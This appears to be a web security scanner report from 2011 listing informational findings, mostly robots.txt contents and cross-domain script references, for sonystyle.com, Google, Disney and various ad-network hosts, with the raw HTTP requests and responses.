HTTP/1.1 200 OK Content-Type: application/x-sdch Last-Modified: Sun, 15 May 2011 23:13:23 GMT Date: Mon, 16 May 2011 00:02:13 GMT Expires: Mon, 16 May 2011 00:02:13 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe Content-Length: 116591 Domain: .google.com Path: /search <!doctype html> <head> <title>re - Google Search</title> <script>window.google= ...[SNIP]... <a href="/search?hl=en&q ...[SNIP]... <b>www.ahttp://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache:www ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache ...[SNIP]... <a href="/search?hl=en&q ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache:_AF ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk ...[SNIP]... <a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK Last-Modified: Fri, 13 May 2011 19:22:00 GMT Accept-Ranges: bytes ntCoent-Length: 28936 Content-Type: application/x-javascript Content-Length: 28936 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:52 GMT Connection: close Cache-Control: private // TEMPORARY FREEZE OVERRIDE function unFreezePage() {} function freezePage() { popOpen('busyIndicator'); document.getElementById( var delayedFuncti ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK Last-Modified: Tue, 03 May 2011 21:22:34 GMT Accept-Ranges: bytes ntCoent-Length: 20033 Content-Type: application/x-javascript Content-Length: 20033 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:51 GMT Connection: close Cache-Control: private /* SONY | SONY STYLE * Homepage JS Functions and Event Listeners * * Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com * Alex Jain, Sr As ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Last-Modified: Fri, 13 May 2011 19:22:00 GMT Accept-Ranges: bytes ntCoent-Length: 28936 Content-Type: application/x-javascript Content-Length: 28936 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:00 GMT Connection: keep-alive Cache-Control: private // TEMPORARY FREEZE OVERRIDE function unFreezePage() {} function freezePage() { popOpen('busyIndicator'); document.getElementById( var delayedFuncti ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /wcsstore/SonyStyleS |
GET /wcsstore/SonyStyleS Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Last-Modified: Tue, 03 May 2011 21:22:34 GMT Accept-Ranges: bytes ntCoent-Length: 20033 Content-Type: application/x-javascript Content-Length: 20033 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:17 GMT Connection: keep-alive Cache-Control: private /* SONY | SONY STYLE * Homepage JS Functions and Event Listeners * * Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com * Alex Jain, Sr As ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://0.gravatar.com |
Path: | /avatar/4c44589c9d07 |
GET /robots.txt HTTP/1.0 Host: 0.gravatar.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=300 Content-Type: text/plain Date: Mon, 16 May 2011 01:24:43 GMT Expires: Mon, 16 May 2011 01:29:43 GMT Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT Server: ECS (dca/5339) X-Cache: HIT Content-Length: 99 Connection: close User-Agent: * Disallow: /*.json Disallow: /*.xml Disallow: /*.php Disallow: /*.vcf Disallow: /*.qr |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.monetate.net |
Path: | /trk/3/s/a-06b34e08/p |
GET /robots.txt HTTP/1.0 Host: a.monetate.net |
HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2011 01:29:53 GMT Content-Type: text/plain Content-Length: 26 Last-Modified: Thu, 12 Aug 2010 15:52:45 GMT Connection: close Accept-Ranges: bytes User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /j.ad |
GET /robots.txt HTTP/1.0 Host: a.tribalfusion.com |
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/plain Content-Length: 26 Connection: Close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /adj/tmg.telegraph |
GET /robots.txt HTTP/1.0 Host: ad-emea.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/plain Content-Length: 101 Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT Date: Mon, 16 May 2011 01:19:40 GMT User-Agent: AdsBot-Google Disallow: User-Agent: MSNPTC Disallow: User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N6434.1165.SONY.COM |
GET /robots.txt HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/plain Content-Length: 101 Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT Date: Sun, 15 May 2011 21:21:44 GMT User-Agent: AdsBot-Google Disallow: User-Agent: MSNPTC Disallow: User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /robots.txt HTTP/1.0 Host: ad.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Date: Mon, 16 May 2011 01:19:49 GMT Connection: close User-agent: * Disallow: /app Disallow: /server |
Severity: | Information |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /robots.txt HTTP/1.0 Host: ahome.disney.go.com |
HTTP/1.0 200 OK Cache-Control: max-age=60 Date: Mon, 16 May 2011 01:29:23 GMT Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 16 May 2011 01:23:29 GMT Accept-Ranges: bytes ETag: "80be91dc6713cc1:10eb" Server: Microsoft-IIS/6.0 From: DOLDISWEB10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=604B3504-4F29-4A9D Cache-Expires: Mon, 16 May 2011 01:33:29 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 724 Connection: close # /robots.txt file for http://home.disney.go.com User-Agent: DCOM FAST Enterprise Crawler Disallow: /search/ User-agent: * Disallow: /_global/ Disallow: /_lib/ Disallow: /_modules/ Disallow: /admin ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ajax.googleapis |
Path: | /ajax/libs/jquery/1.3.2 |
GET /robots.txt HTTP/1.0 Host: ajax.googleapis.com |
HTTP/1.0 200 OK Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT Date: Sun, 15 May 2011 20:26:37 GMT Expires: Sun, 15 May 2011 20:26:37 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /search Disallow: /groups Disallow: /images Disallow: /catalogs Disallow: /catalogues Disallow: /news Allow: /news/directory Disallow: /nwshp Disallow: /setnewsprefs? Disallow: ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://api.ak.facebook |
Path: | /restserver.php |
GET /robots.txt HTTP/1.0 Host: api.ak.facebook.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/plain; charset=utf-8 X-FB-Server: 10.36.35.126 X-Cnection: close Content-Length: 24 Cache-Control: max-age=86400 Expires: Tue, 17 May 2011 01:25:14 GMT Date: Mon, 16 May 2011 01:25:14 GMT Connection: close User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://atd.agencytra |
Path: | /WatsonTracker/IMP |
GET /robots.txt HTTP/1.0 Host: atd.agencytradingdesk.net |
HTTP/1.1 200 OK Content-Length: 135 Content-Type: text/plain Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT Accept-Ranges: bytes ETag: "18b4e0a2cd4ac71:8e6" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:26:08 GMT Connection: keep-alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" User-agent: * Allow: /Corporate/ Disallow: /TagPublish/ Disallow: /xt2/ Disallow: /rt1/ Disallow: /CWClick/ Disallow: /ContextAd/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /robots.txt HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT Content-Length: 28 Content-Type: text/plain Expires: Mon, 16 May 2011 21:31:00 GMT Date: Sun, 15 May 2011 21:31:00 GMT Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /utils/ecSet.js |
GET /robots.txt HTTP/1.0 Host: c7.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Tue, 31 May 2005 07:08:00 GMT ETag: "32e64b-4c-3f861aa21f400" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: text/plain X-Varnish: 1036340324 Date: Mon, 16 May 2011 01:30:23 GMT Content-Length: 76 Connection: close # Officer Barbrady says "Nothing to see here...." User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://cdn.turn.com |
Path: | /server/ddc.htm |
GET /robots.txt HTTP/1.0 Host: cdn.turn.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Pragma: no-cache Content-Type: text/html;charset=UTF-8 Cache-Control: private, no-cache, no-store, must-revalidate Date: Mon, 16 May 2011 01:19:51 GMT Content-Length: 47 Connection: close User-agent: * Disallow: /app Disallow: /server |
Severity: | Information |
Confidence: | Certain |
Host: | http://cdn5.tribalfusion |
Path: | /media/1956006/frame.html |
GET /robots.txt HTTP/1.0 Host: cdn5.tribalfusion.com |
HTTP/1.0 200 OK P3p: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 Content-Length: 26 X-Reuse-Index: 758 Content-Type: text/plain Date: Sun, 15 May 2011 21:31:35 GMT Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://cm.g.doubleclick |
Path: | /pixel |
GET /robots.txt HTTP/1.0 Host: cm.g.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/plain Date: Mon, 16 May 2011 01:19:56 GMT Server: Cookie Matcher Cache-Control: private X-XSS-Protection: 1; mode=block User-Agent: * Disallow: / Noindex: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /asp/usataj/usatajhost |
GET /robots.txt HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT Accept-Ranges: bytes ETag: "0eda5b4165ccb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:47 GMT Connection: close Content-Length: 1660 # robots.txt for http://www.usatoday.com sitemap: http://www.usatoday.com User-agent:* Disallow:/feedback Disallow:/HTML Disallow:/html Disallow:/cgi-bin Disallow:/system ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://contextweb |
Path: | /asp/Context/Context |
GET /robots.txt HTTP/1.0 Host: contextweb.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT Accept-Ranges: bytes ETag: "0fbccbb165ccb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 1660 Date: Mon, 16 May 2011 01:19:45 GMT Connection: close # robots.txt for http://www.usatoday.com sitemap: http://www.usatoday.com User-agent:* Disallow:/feedback Disallow:/HTML Disallow:/html Disallow:/cgi-bin Disallow:/system ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /um |
GET /robots.txt HTTP/1.0 Host: d.xp1.ru4.com |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Mon, 16 May 2011 01:19:58 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/plain Last-modified: Fri, 31 Jul 2009 18:32:10 GMT Content-length: 26 Etag: "1a-4a7338aa" Accept-ranges: bytes Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://dar.youknowbest |
Path: | / |
GET /robots.txt HTTP/1.0 Host: dar.youknowbest.com |
HTTP/1.0 200 OK Content-Length: 29 Content-Type: text/plain Content-Location: http://dar.youknowbest Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT Accept-Ranges: bytes ETag: "01e78cfe96cb1:de9" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Server: EN-ADSWEB04 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:41:16 GMT Connection: close ...User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://data.adsrvr.org |
Path: | /map/cookie/contextweb |
GET /robots.txt HTTP/1.0 Host: data.adsrvr.org |
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 Content-Type: text/plain Date: Mon, 16 May 2011 01:26:11 GMT Accept-Ranges: bytes ETag: "a06beef17b6cc1:0" Connection: close Last-Modified: Fri, 29 Apr 2011 14:44:29 GMT X-Powered-By: ASP.NET Content-Length: 28 User-agent: * Disallow: * |
Severity: | Information |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /robots.txt HTTP/1.0 Host: dcl.wdpromedia.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 30 Apr 2011 18:26:42 GMT Content-Type: text/plain Content-Length: 2113 Date: Mon, 16 May 2011 01:24:39 GMT Connection: close User-agent: * # Disney Cruise Line Excludes Disallow: /dcl/en_US/_lib/ Disallow: /dcl/_global/modules/ Disallow: /dcl/_lib/ Disallow: /dcl/system/ Disallow: /dcl/myCruise/myProfile Di ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /concat/4.39.1.5/css |
GET /robots.txt HTTP/1.0 Host: dcl2.wdpromedia.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 30 Apr 2011 18:26:42 GMT Content-Type: text/plain Content-Length: 2113 Date: Mon, 16 May 2011 01:23:40 GMT Connection: close User-agent: * # Disney Cruise Line Excludes Disallow: /dcl/en_US/_lib/ Disallow: /dcl/_global/modules/ Disallow: /dcl/_lib/ Disallow: /dcl/system/ Disallow: /dcl/myCruise/myProfile Di ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /robots.txt HTTP/1.0 Host: disneycruise.disney.go |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 30 Apr 2011 18:26:42 GMT Content-Type: text/plain Content-Length: 2113 Date: Mon, 16 May 2011 01:35:40 GMT Connection: close User-agent: * # Disney Cruise Line Excludes Disallow: /dcl/en_US/_lib/ Disallow: /dcl/_global/modules/ Disallow: /dcl/_lib/ Disallow: /dcl/system/ Disallow: /dcl/myCruise/myProfile Di ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://feeds.bbci.co.uk |
Path: | /news/rss.xml |
GET /robots.txt HTTP/1.0 Host: feeds.bbci.co.uk |
HTTP/1.0 200 OK Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT Server: Apache Content-Length: 464 Content-Type: text/plain Cache-Control: max-age=16 Expires: Sun, 15 May 2011 21:19:20 GMT Date: Sun, 15 May 2011 21:19:04 GMT Connection: close User-agent: * Disallow: /cgi-bin Disallow: /cgi-perl Disallow: /lexaurus Disallow: /mpapps Disallow: /mpsearch Disallow: /mtk Disallow: /weatherbeta Disallow: /weather/hi/about/newsid ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://feeds.delicious |
Path: | /v2/json/urlinfo/data |
GET /robots.txt HTTP/1.0 Host: feeds.delicious.com |
HTTP/1.0 200 OK Date: Mon, 16 May 2011 01:25:00 GMT P3P: policyref="http://info Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 01:25:00 GMT Last-Modified: Tue, 10 May 2011 23:41:14 GMT Accept-Ranges: bytes Content-Length: 1236 Content-Type: text/plain; charset=utf-8 Age: 0 Server: YTS/1.19.4 User-agent: * Disallow: / User-agent: delicious-thumbnails Allow: / User-agent: Slurp Allow: / Disallow: /inbox Disallow: /subscriptions Disallow: /network Disallow: /search Disallow: /post Disall ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fingerhut-www |
Path: | /baynote/tags3/common |
GET /robots.txt HTTP/1.0 Host: fingerhut-www.baynote.net |
HTTP/1.1 200 OK Server: BNServer Accept-Ranges: bytes ETag: W/"216-1305507005000" Last-Modified: Mon, 16 May 2011 00:50:05 GMT Content-Type: text/plain Content-Length: 216 Date: Mon, 16 May 2011 01:33:14 GMT Connection: close User-agent: * Disallow: /baynote/ Disallow: /error400.html Disallow: /error403.html Disallow: /error404.html Disallow: /error500.html Disallow: /index.jsp Disallow: /search/ Disallow: /socialsearch/ D ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fingerhut.tt |
Path: | /m2/fingerhut/mbox |
GET /robots.txt HTTP/1.0 Host: fingerhut.tt.omtrdc.net |
HTTP/1.1 200 OK ETag: W/"25-1299290853000" Accept-Ranges: bytes Content-Length: 25 Date: Mon, 16 May 2011 01:33:10 GMT Connection: close Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT Server: Test & Target Content-Type: text/plain User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /robots.txt HTTP/1.0 Host: fls.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/plain Date: Sun, 15 May 2011 20:26:48 GMT Server: Floodlight server Cache-Control: private X-XSS-Protection: 1; mode=block User-Agent: * Disallow: / Noindex: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://gannett.gcion.com |
Path: | /addyn/3.0/5111.1/809051 |
GET /robots.txt HTTP/1.0 Host: gannett.gcion.com |
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/html Content-Length: 26 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/viewthroughc |
GET /robots.txt HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK Content-Type: text/plain Date: Sun, 15 May 2011 21:31:06 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block User-Agent: * Allow: /ads/preferences/ Disallow: / Noindex: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://gs.instantservice |
Path: | /geoipAPI.js |
GET /robots.txt HTTP/1.0 Host: gs.instantservice.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:23 GMT Server: Apache Last-Modified: Tue, 22 Mar 2011 14:41:56 GMT ETag: "3bbaa-1a-3ef0b500" Accept-Ranges: bytes Content-Length: 26 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=ISO-8859-1 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://https.edge.ru4.com |
Path: | /smartserve/ad |
GET /robots.txt HTTP/1.0 Host: https.edge.ru4.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"26-1190051510000" Last-Modified: Mon, 17 Sep 2007 17:51:50 GMT Content-Type: text/plain Content-Length: 26 Date: Mon, 16 May 2011 01:38:36 GMT Connection: close User-agent: * Disallow: / |
